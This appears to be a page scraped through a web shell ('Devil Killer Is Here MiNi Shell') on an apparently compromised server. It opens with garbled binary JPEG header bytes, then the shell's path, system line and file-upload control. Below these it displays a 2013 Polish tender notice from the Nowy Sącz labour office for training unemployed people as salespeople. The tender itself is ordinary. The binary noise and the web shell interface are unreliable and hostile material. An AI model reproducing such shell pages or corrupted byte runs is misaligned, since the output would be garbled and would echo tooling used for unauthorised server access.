JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130228/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130228/82986-N-2013.html

<p class="kh_header"><b>Nowy Sącz: Nowoczesny sprzedawca. Nr postępowania: DOR-271-8/13</b><br>
<b>Numer ogłoszenia: 82986 - 2013; data zamieszczenia: 28.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy dla Powiatu Nowosądeckiego , ul. Nawojowska 118, 33-300 Nowy Sącz, woj. małopolskie, tel. 018 4400808, faks 018 4400808.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.powiat-ns.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nowoczesny sprzedawca. Nr postępowania: DOR-271-8/13.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia zawarto w załączniku nr 1 do specyfikacji istotnych warunków zamówienia.
I. Cel i czas realizacji szkolenia 
1. Zorganizowanie i przeprowadzenie szkolenia  dla  18 osób bezrobotnych w ramach projektu  pn.: Twoja decyzja - nasza pomoc współfinansowanego ze środków Unii Europejskiej  w ramach Europejskiego Funduszu Społecznego, Program Operacyjny Kapitał Ludzki,  Priorytet VII  Działanie 7.2  Poddziałanie 7.2.1. 
2. Celem szkolenia jest nabycie przez uczestników szkolenia wiedzy i umiejętności praktycznych niezbędnych do podjęcia pracy w zawodzie sprzedawcy z odpowiednimi kwalifikacjami zawodowymi.
3. Czas trwania szkolenia wynosi: 38 dni  roboczych  licząc od daty rozpoczęcia szkolenia,  w tym egzamin wewnętrzny przeprowadzony przez komisję powołaną przez Wykonawcę, który powinien odbyć się w przedostatnim dniu szkolenia. 
Ostatni dzień szkolenia przeznaczony jest na zakończenie szkolenia.
4. Zamawiający wymaga, aby liczba godzin szkoleniowych w każdym dniu szkolenia wynosiła 6 godzin zegarowych, z wyjątkiem  warsztatów z psychologiem (3 dni po 5 godzin zegarowych).
5. Intensywność zajęć: codziennie w dni robocze od poniedziałku do piątku, przeciętnie nie mniej niż  25 godzin zegarowych w tygodniu.
6. Zajęcia powinny odbywać się nie później niż do godziny 1600, natomiast  zajęcia praktyczne w placówkach handlowych nie dłużej niż do godziny 1800.
7. Planowany termin rozpoczęcia szkolenia: do 7 dni od podpisania umowy.
8. Na wypadek gdyby osoba/y przeznaczone do programu szkolenia, z przyczyn,  na które Zamawiający nie ponosi odpowiedzialności zrezygnowała/y z udziału w szkoleniu przed datą zawarcia umowy, Zamawiający zastrzega sobie prawo do zawarcia umowy  dla  mniejszej ilości osób bez poniesienia skutków finansowych z tego tytułu.
 	
II. Zakres tematyczny  szkolenia
1. Liczba godzin szkoleniowych dla każdego uczestnika szkolenia wynosi: 213 godzin zegarowych,  w tym:
1.1. Moduł  I -  warsztaty z psychologiem obejmujące  15 godzin  zegarowych  (3 dni po 5 godz.);
1.2.  Moduł  II - zajęcia  teoretyczno - zawodowe związane  z zawodem  sprzedawcy -   48 godzin zegarowych;  
1.3.   Moduł   III - warsztaty komputerowe z  obsługi  licencjonowanego  programu  fakturowo  -   magazynowego -  36 godzin zegarowych; 
1.4.  Moduł  IV -  obsługa kasy fiskalnej - 18 godzin zegarowych;
1.5.  Moduł  V - elementy psychologii sprzedaży  i komunikacji z klientem -  18 godzin zegarowych zajęć teoretyczno - zawodowych;
1.6  Moduł  VI - zajęcia praktyczne w placówkach handlowych, które potencjalnie mogą zatrudnić absolwentów szkolenia  - 78 godzin  zegarowych. 
2. Zamawiający wymaga, aby   warsztaty z psychologiem realizowane były jako pierwsze,  a Moduł VI (zajęcia praktyczne) jako ostatnie. 

III. Miejsce realizacji szkolenia
1. W przypadku realizacji zajęć na terenie Powiatu Nowosądeckiego Wykonawca zabezpieczy we własnym zakresie dojazd uczestników szkolenia z Nowego Sącza do Ośrodka Szkoleniowego oraz powrót do Nowego Sącza w każdym dniu szkolenia. 
2. W przypadku realizacji zajęć szkoleniowych z zakwaterowaniem  poza Nowym Sączem lub Powiatem Nowosądeckim Wykonawca we własnym zakresie zapewni:
a) Dojazd wszystkim uczestnikom szkolenia z Nowego Sącza do Ośrodka Szkoleniowego i z Ośrodka Szkoleniowego do Nowego Sącza. Przewidywany transport powinien obejmować dojazd  w poniedziałek rano i powrót w piątek po zajęciach w każdym tygodniu zajęć. 
Maksymalny czas dojazdu na szkolenie z Nowego Sącza do miejsca odbywania zajęć oraz powrót z miejsca odbywania zajęć do Nowego Sącza  nie powinien przekraczać 3 godzin zegarowych.
b) Codzienny dojazd uczestników szkolenia z miejsca zakwaterowania do miejsca odbywania zajęć w sytuacji, gdy miejsce zakwaterowania uczestników będzie inne niż miejsce odbywania zajęć.
c) Pełne wyżywienie oraz zakwaterowanie wszystkim uczestnikom szkolenia.

IV. Dokumenty i oświadczenia, które Wykonawca jest zobowiązany przedłożyć   Zamawiającemu do  zatwierdzenia najpóźniej na trzy dni przed podpisaniem umowy:
1. Program szkolenia (załącznik nr 2 do Umowy), który  powinien być opracowany zgodnie z rozporządzeniem Ministra Pracy i Polityki Społecznej z dnia 14 września 2010 r. w sprawie standardów i warunków prowadzenia  usług rynku pracy (Dz. U. z 2010 r. Nr 177 poz. 1193 z późn. zm.) i zawierać co najmniej następujące zagadnienia:
a) nazwę i zakres  szkolenia,
b) czas trwania i sposób organizacji szkolenia,
c) wymagania wstępne dla uczestników szkolenia,
d) cele  szkolenia,
e) plan nauczania określający tematy zajęć edukacyjnych oraz ich wymiar, z uwzględnieniem części teoretycznej i  części praktycznej,
f) opis treści szkolenia w zakresie poszczególnych zajęć edukacyjnych,
g) wykaz literatury oraz niezbędnych środków i materiałów dydaktycznych,
h) sposób sprawdzenia efektów szkolenia - przewidziane sprawdziany i egzaminy.
2. Harmonogram zajęć szkoleniowych (załącznik nr 3 do Umowy), który powinien zawierać:
a) datę (poszczególne dni szkolenia),
b) czas trwania zajęć (od godz. do godz. ; z podziałem na grupy - dot. Modułu  III i IV); c) liczbę godzin  zegarowych,
d) tematykę zajęć,  
e) miejsce realizacji szkolenia,
f) imię i nazwisko osoby prowadzącej zajęcia w każdym dniu szkolenia, 
g) ilość godzin w danym miesiącu.
3. Kserokopię Akredytacji Kuratorium  Oświaty zgodnej z przedmiotem zamówienia w przypadku posiadania stosownego dokumentu.
4. Kserokopie Certyfikatu Jakości Usług ISO w przypadku posiadania stosownego dokumentu.
5. Kserokopie dokumentów potwierdzających kwalifikacje kadry dydaktycznej (świadectwa dyplomy ukończenia szkoły), która będzie uczestniczyć w prowadzeniu zajęć szkoleniowych w poszczególnych modułach, potwierdzone za zgodność  z oryginałem.
6. Oświadczenie Wykonawcy o posiadaniu przez osoby osobę wskazane wskazaną do realizacji szkolenia doświadczenia zawodowego oraz doświadczenia  w realizacji określonej liczby szkoleń  zgodnie  z wymogami  zawartymi w Specyfikacji Istotnych Warunków Zamówienia.
7. Wskazanie koordynatora organizacyjnego  odpowiedzialnego za nadzór wewnętrzny nad zamówieniem  (imię i nazwisko  koordynatora, stanowisko, telefon kontaktowy, fax, e- mail).
	Osoba y te będą odpowiedzialne  za opiekę  i kontakt  z uczestnikami  szkolenia  oraz za prawidłową realizację zawartej umowy i  bezpośredni kontakt z Zamawiającym.  
Należy uwzględnić wynagrodzenie dla tej osoby osób w kosztach szkolenia.
8.  Wzór zaświadczeń  i certyfikatu potwierdzających ukończenie szkolenia. 
9.  Wzór ankiety dla absolwentów  szkolenia służącej do oceny szkolenia.
10. Ewentualnie dokumenty potwierdzające upoważnienie do reprezentowania osoby  do podpisania umowy. 

V. Pozostałe warunki  realizacji przedmiotu zamówienia:
1. Wykonawca w dniu rozpoczęcia szkolenia przekaże wszystkim uczestnikom szkolenia harmonogram zajęć szkoleniowych oraz zapozna uczestników szkolenia z programem szkolenia.
2. Wykonawca przedstawi Zamawiającemu  do zatwierdzenia  szczegółowy harmonogram zajęć praktycznych (załącznik nr 4 do Umowy)  najpóźniej na trzy dni przed rozpoczęciem zajęć praktycznych, zawierający:
a) datę (poszczególne dni zajęć praktycznych),
b) czas trwania zajęć praktycznych (od godz. do godz.),
c) liczbę godzin  zegarowych,
d)  wykaz osób odbywających praktykę w danym miejscu,
e)  tematykę zajęć,
f)  miejsce realizacji zajęć praktycznych (dokładny adres), 
g) imiona i nazwiska opiekunów stanowiskowych w poszczególnych miejscach praktyk.
3. Program szkolenia powinien:	
a) gwarantować uczestnikom szkolenia solidne i profesjonalne przygotowanie do testów/egzaminów  i do wykonywania pracy w zawodzie  sprzedawcy, 
b) uwzględniać zróżnicowany poziom umiejętności i wiedzy uczestników szkolenia,
c)  wykorzystywać standardy kwalifikacji zawodowych i modułowe programy szkoleń zawodowych, dostępne na stronie internetowej www.standardyiszkolenia.praca.gov.pl oraz być zgodny z  wymogami określonymi w rozporządzeniu MEN z dnia 11.01.2012 r. w sprawie kształcenia ustawicznego w formach pozaszkolnych (Dz. U. z 17.02.2012, poz. 186).
4. Program szkolenia powinien obejmować następujące moduły tematyczne:
4.1. Moduł I -  warsztaty z psychologiem - obejmujący  15 godzin  zegarowych  (3 dni po 5 godz.) zawierający  takie zagadnienia jak:
stres i samoocena,
asertywność i samopoznanie, 
motywacja i automotywacja,
pozytywne myślenie.
	
Zamawiający wymaga aby zajęcia szkoleniowe  w  I  module poprowadziła ły  osoba y posiadająca e  co najmniej wykształcenie wyższe kierunkowe -  psychologia  oraz  prowadziła li   co najmniej 3 warsztaty o tożsamej tematyce zawartej   w module.

4.2. Moduł II - zajęcia  teoretyczno- zawodowe związane  z zawodem  sprzedawcy - 48 godzin zegarowych, obejmujący nie mniej niż  poniżej wymienione zagadnienia:
1)  wymagania psychofizyczne właściwe dla zawodu sprzedawcy, 
2)  podstawy prawne związane z zawodem sprzedawcy,
3)  odpowiedzialność  materialna, karna  i służbowa, 
4)  rodzaje punktów sprzedaży i ich charakterystyka,
5)  wyposażenie punktu sprzedaży detalicznej,
6) organizowanie własnego stanowiska pracy w jednostce handlowej zgodnie z przepisami i zasadami bezpieczeństwa  i higieny pracy, ergonomii, ochrony przeciwpożarowej i ochrony środowiska oraz zapewnienie i przestrzeganie warunków sanitarnych sprzedaży,
7) organizacja handlu  w gospodarce rynkowej, poznawanie otoczenia przedsiębiorstwa  handlowego,
8) zawieranie transakcji sprzedaży oraz przyjmowanie i wypełnianie dokumentów z nią związanych, dokumentowanie obrotu towarowego, wykonywanie operacji rachunkowo-kasowych, rozliczanie  i zabezpieczanie utargu oraz punktu sprzedaży detalicznej lub hurtowej przed włamaniem i kradzieżą,
9) organizacja gospodarki magazynowej, organizacja  zaopatrzenia  i przyjmowania  dostaw towarów,
10) elementy towaroznawstwa handlowego: istota kodowania towarów, 
11) rozmieszczanie i przechowywanie towarów w jednostkach handlu detalicznego,
12) obsługa klienta z wykorzystaniem  aktywnych form i technik sprzedaży, 
13) realizacja płatności gotówkowych i bezgotówkowych,
14) przyjmowanie i rozpatrywanie reklamacji zakupionych towarów,
15) marketing i reklama w handlu detalicznym, stosowanie zasady merchandisingu (opieka nad towarem i jego korzystne wyeksponowanie), 
16) kultura osobista i etyka zawodowa na stanowisku  sprzedawcy, 
17) dbanie o wizerunek punktu sprzedaży oraz jakość obsługi klienta, komunikacja i perswazja jako formy oddziaływania na klienta,
18) savoir - vivre, elementy autoprezentacji w kontakcie z klientem,
19) przeprowadzanie kontroli wewnętrznej (inwentaryzacja, remanent) punktu sprzedaży  lub uczestniczenie w niej,
20) znaki i banknoty pieniężne używane  do wystawiania faktur i rachunków, sprawdzanie autentyczności banknotów, tryb postępowania w przypadku ujawnienia banknotu fałszywego, 
21) obliczenia sklepowe, 
22) kształtowanie cen  w jednostkach sprzedaży, 
23) dekorowanie wnętrza sklepu  i okna wystawowego,
24) korzystanie z wyposażenia i urządzeń magazynowych, sklepowych, biurowych zgodnie z przepisami bhp, 
25) wizerunek zawodowy sprzedawcy.
	
Zamawiający wymaga, aby osoba y prowadząca e  MODUŁ  II  posiadała y:
wykształcenie  ekonomiczne lub handlowe  - wyższe zawodowe lub magisterskie lub podyplomowe oraz prowadziła/y co najmniej 5 szkoleń o tożsamej tematyce zawartej w module. 

4.3. MODUŁ III - zajęcia komputerowe z obsługi licencjonowanego programu fakturowo-magazynowego obejmujący 36 godzin zegarowych z zakresu:
1)  ewidencja kontrahentów,
2)  ewidencja towarów, cen i marż,
3)  rejestr sprzedaży i zakupów,
4)  kontrola stanów magazynowych,
5)  wystawienie dokumentów  sprzedaży: faktury, pro-forma, rachunków itd.,
6)  korekta  zamówienia, faktury zakupu, faktury  sprzedaży,
7)  ćwiczenia praktyczne - fakturowanie komputerowe.

Każdy uczestnik winien mieć zapewniony indywidualny dostęp do  komputera z oprogramowaniem                (licencjonowany program fakturowo-magazynowy) na zasadzie 1 osoba - 1 stanowisko.

	Zamawiający wymaga, aby osoby (co najmniej 2 z uwagi na podział kursantów na dwie grupy)  prowadzące  MODUŁ  III  posiadały  wykształcenie informatyczne lub ekonomiczne lub handlowe  -  wyższe zawodowe lub magisterskie lub podyplomowe  oraz prowadziły co najmniej 5 szkoleń  o tożsamej tematyce zawartej  w module.
	
Zamawiający wymaga, aby zajęcia z Modułu III były prowadzone  w dwóch oddzielnych  grupach i w dwóch salach szkoleniowych.  Podziału na grupy dokona Wykonawca.

4.4. MODUŁ IV - obsługa kasy fiskalnej -  obejmujący 18 godzin zegarowych zajęć, zawierający  co najmniej następujące  zagadnienia tematyczne:
1) kasa fiskalna jako szczególna forma dokumentacji sprzedaży - omówienie stosownej ustawy, 
2) budowa oraz rodzaje i zastosowanie kas fiskalnych, 
3) programowanie kas fiskalnych,
4) praktyczna obsługa kas fiskalnych różnych typów i urządzeń peryferyjnych (czytnik kodów kreskowych, czytnik kart płatniczych, waga elektroniczna) - symulacja obsługi klienta, 
5) dokumenty kasowe (paragon, raport dobowy i raport okresowy),
6) transmisja danych z kas fiskalnych do programów magazynowych i księgowych,
7)  błędy obsługi kasy fiskalnej  i sposoby ich rozwiązywania, 
8)  wymiana rolki  papieru.
Ponadto Wykonawca  zapewni podczas zajęć z obsługi  kasy fiskalnej możliwość nabycia praktycznych umiejętności z obsługi: metkownicy, wagi elektronicznej, czytników  kodów kreskowych, czytników kart płatniczych (opis rynku kart płatniczych i zasady działania kart płatniczych, rodzaje transakcji kartami płatniczymi, zabezpieczanie kart i procedury weryfikacyjne,  wykonywanie transakcji kartami płatniczymi, budowa terminala PINpada,  doładowania telefonów komórkowych).

Każdy uczestnik winien mieć zapewniony indywidualny dostęp do  kasy fiskalnej na zasadzie 1 osoba - 1 stanowisko.

Zamawiający wymaga, aby zajęcia z Modułu IV  były prowadzone  w dwóch oddzielnych  grupach i w dwóch salach szkoleniowych.  Podziału na grupy dokona Wykonawca. Zamawiający wymaga co najmniej 2 prowadzących.
		 
Zamawiający wymaga, aby osoby (co najmniej 2 z uwagi na podział kursantów na dwie grupy) prowadzące Moduł IV posiadały co najmniej wykształcenie średnie oraz ukończone szkolenia z zakresu obsługi i programowania kas fiskalnych potwierdzone odpowiednim zaświadczeniem oraz prowadziły co najmniej 5 szkoleń o tożsamej tematyce zawartej w module.

4.5. Moduł V - elementy psychologii  sprzedaży  i komunikacji z klientem -  18 godzin zegarowych zajęć teoretyczno - zawodowych i warsztatowych  w zakresie  zasad prowadzenia skutecznej rozmowy sprzedażowej   oraz obsługi klienta, który  powinien zawierać  co najmniej  takie zagadnienia jak:
1)  cechy dobrego sprzedawcy 
2)  standardy profesjonalnej obsługi klienta,  rosnąca rola  porad  i doradztwa
3)  strategie marketingowe (identyfikacja potrzeb klienta, klasyfikacja klienta itd.)
4)  komunikacja jako narzędzie w kontaktach z klientami 
5)  profesjonalna obsługa klienta z elementami obsługi tzw. trudnego klienta, etapy obsługi klienta - obsługa bezpośrednia  i telefoniczna klienta
6)  asertywność w kontakcie z klientem trudnym
7)  współczesne techniki sprzedaży
8)  ocena techniki wpływu społecznego, perswazji i argumentowania, taktyki negocjacyjne
9) obsługa klienta z wykorzystaniem  aktywnych form i technik sprzedaży -  symulacje  rozmów handlowych, scenki sytuacyjne - zajęcia warsztatowe
10) psychologia obsługi klienta, utrzymanie  dobrych relacji z klientem 
11) savoir-vivre w życiu zawodowym.

Zamawiający wymaga, aby  osoba/y  prowadząca/e   zajęcia z  Moduł V  posiadała/y: wykształcenie kierunkowe - co najmniej wyższe zawodowe lub magisterskie lub podyplomowe  oraz   prowadziła/y co najmniej 5 szkoleń o tożsamej tematyce zawartej w module. 

4.6. MODUŁ  VI - zajęcia praktyczne  -  obejmujący 78 godzin zegarowych zajęć praktycznych   w placówkach handlowych, które potencjalnie mogą zatrudnić absolwentów szkolenia. 

Program zajęć praktycznych powinien zawierać zagadnienia omawiane podczas zajęć teoretyczno-zawodowych i warsztatowych (od Modułu II do V) ze szczególnym  naciskiem na samodzielną obsługę kasy fiskalnej (przy opiekunie stanowiskowym). 

Zajęcia praktyczne powinny być zrealizowane  dla  maksymalnie  połowy kursantów  w sklepach  spożywczych, natomiast  pozostałe osoby winny być skierowane na zajęcia praktyczne do sklepów  w innej branży (np. sklep kosmetyczny, odzieżowy, obuwniczy,  papierniczy, ogrodniczy, meblowy itp.).

Zamawiający wymaga, aby opiekunowie w poszczególnych miejscach praktyk -  posiadali wykształcenie co najmniej  zasadnicze zawodowe i co najmniej 3 lata doświadczenia zawodowego związanego z tematyką szkolenia. 
Zamawiający wymaga co najmniej  9 opiekunów praktyk,  z uwagi na liczbę osób odbywających praktykę w jednej placówce handlowej, która nie powinna być większa niż 2 osoby.

5. Organizacja i realizacja  zajęć praktycznych
5.1. Zajęcia praktyczne powinny być realizowane w placówkach handlowych (firmy, które potencjalnie mogą zatrudnić absolwentów szkolenia)  na terenie Powiatu lub Miasta Nowego Sącza. 
W przypadku realizacji zajęć praktycznych na terenie Powiatu Nowosądeckiego Wykonawca zabezpieczy we własnym zakresie dojazd uczestników szkolenia z Nowego Sącza do miejsca odbywania zajęć praktycznych oraz powrót do Nowego Sącza w każdym dniu szkolenia. 
5.2. Liczba osób odbywających praktykę w jednej placówce handlowej nie powinna być większa niż 2 osoby.
5.3. Program zajęć praktycznych powinien zawierać zagadnienia omawiane podczas zajęć teoretyczno-zawodowych i warsztatowych.
5.4. Wykonawca zapozna opiekunów  stanowiskowych  z programem zajęć praktycznych i przekaże go wyznaczonym opiekunom w poszczególnych miejscach praktyk. 
5.5. Zamawiający wymaga, aby w każdej placówce handlowej Wykonawca wyznaczył opiekuna stanowiskowego, który będzie sprawował opiekę zawodową nad kursantem/kursantami.
5.6. Podczas realizacji zajęć praktycznych w placówkach handlowych Wykonawca zobowiązany jest przygotować imienny wykaz opiekunów stanowiskowych w poszczególnych miejscach realizowanych praktyk oraz uwzględnić ich wynagrodzenie  w kosztach szkolenia.
5.7. Wykonawca, co najmniej raz w tygodniu, przeprowadzi bezpośrednią rozmowę z opiekunami stanowiskowymi i praktykantami na temat przebiegu praktyki i potwierdzi to w indywidualnej karcie praktyki zawodowej kursanta. 
5.8. Podczas odbywania zajęć  praktycznych w  placówkach handlowych Zamawiający wymaga, aby Wykonawca zapewnił dla każdego uczestnika  szkolenia odzież roboczą składającą się z:  fartucha ochronnego - sprzedawcy z kieszeniami z przewiewnej  tkaniny.
5.9. Odzież robocza, która przejdzie  na własność uczestnika kursu winna być przekazana za potwierdzeniem odbioru (z datą odbioru).
W/w koszty należy uwzględnić przy obliczaniu kosztu szkolenia.
6.Warunki lokalowe oraz wyposażenie pomieszczeń
Wykonawca w celu realizacji przedmiotu zamówienia zapewni:
6.1. odpowiednią spełniająca warunki bhp i ppoż  salę szkoleniową do przeprowadzenia  zajęć  z Modułu I, II, V;
6.2. odpowiednie spełniające warunki bhp i ppoż  dwie sale  szkoleniowe w przypadku  zajęć  z Modułu III - warsztatów komputerowych z obsługi  licencjonowanego  programu  fakturowo - magazynowego oraz Modułu  IV - obsługi kasy fiskalnej;
6.3. sale szkoleniowe do przeprowadzenia  zajęć muszą być wyposażone w odpowiednią liczbę miejsc  i stolików dostosowaną do ilości osób szkolonych  wraz z zapleczem sanitarnym;
6.4. odpowiednie wyposażenie sal tj.: flipchart z blokiem, lub tablica klasyczna czy magnetyczna, sprzęt audiowizualny,  markery;
6.5. warsztat szkoleniowy wyposażony w sprzęt komputerowy wraz z oprogramowaniem  w ilości odpowiadającej liczbie uczestników, w bardzo dobrym stanie technicznym zapewniającym odpowiedni poziom i jakość szkolenia;
6.5.1.  dwie  sale komputerowe  winny być  wyposażone  w jednorodne komputery (tylko laptopy lub tylko komputery stacjonarne) nie starsze niż 5 lat, w bardzo dobrym stanie technicznym umożliwiającym stabilną pracę i wysoki poziom szkolenia;
Każdy uczestnik powinien mieć zapewniony indywidualny dostęp do komputera, kasy fiskalnej  na zasadzie: 1 osoba - 1 stanowisko;
6.6. podczas zajęć z obsługi  kasy fiskalnej  winien być  zapewniony  dostęp  do czytników  kodów kreskowych, czytników kart płatniczych, metkownicy, wagi elektronicznej;
6.7. licencjonowany program fakturowo-magazynowy na bieżąco aktualizowany i zgodny z obowiązującymi przepisami prawnymi;
6.8. budynek i sale szkoleniowe muszą być oznakowane informacją o nazwie szkolenia, numerze sali,    w której  odbywają się zajęcia  wraz  z  naniesionymi  odpowiednimi logotypami i informacją: Szkolenie realizowane w ramach projektu Twoja decyzja - nasza pomoc współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego Program Operacyjny Kapitał Ludzki  Poddziałanie 7.2.1 (wymagany format informacji A 3);
6.9. Wykonawca zapewni uczestnikom szkolenia warunki  pracy zgodnie z przepisami bezpieczeństwa  i higieny pracy oraz odpowiednie zaplecze sanitarne i socjalne;
6.10. Zamawiający wymaga, aby pomieszczenia, w których realizowany będzie przedmiot zamówienia spełniały wymogi: Rozporządzenie Ministra Pracy i Polityki Socjalnej z dnia 26 września 1997 r. w sprawie ogólnych przepisów BHP/ tekst jednolity Dz. U. z 2003 r. Nr 169, poz. 1650 z późn. zm./ oraz Rozporządzenie Ministra Infrastruktury z dnia 12 kwietnia 2002 roku w sprawie warunków technicznych jakim powinny odpowiadać budynki i ich usytuowania / Dz. U. z 2002r. nr 75, poz. 690 z późn. zm./ w szczególności: 
na każdego uczestnika winno przypadać nie mniej niż 2 m2 wolnej powierzchni, 
oświetlenie minimum 200 lux (komputer 500 lux), 
temperatura minimum + 18 oC maximum +26 oC, 
wyposażenie ppoż. (gaśnice, hydranty, oznakowanie rozmieszczenia podręcznego sprzętu gaśniczego, drogi ewakuacyjne, wyjścia ewakuacyjne), 
aktualne badania instalacji elektrycznej, odgromowej, przewodów wentlacyjno - spalinowych, instalacji gazowej, 
przegląd roczny / pięcioletni stanu technicznego budynku, 
odpowiednie (ergonomiczne) wyposażenie (biurka, stoliki, krzesła, szafy, regały), 
toalety z bieżącą wodą (ciepła, zimna) oraz środki czystości (papier toaletowy,
mydło do rąk, ręczniki papierowe lub suszarka do rąk),
wieszaki na odzież (płaszcze, kurtki itp.). 

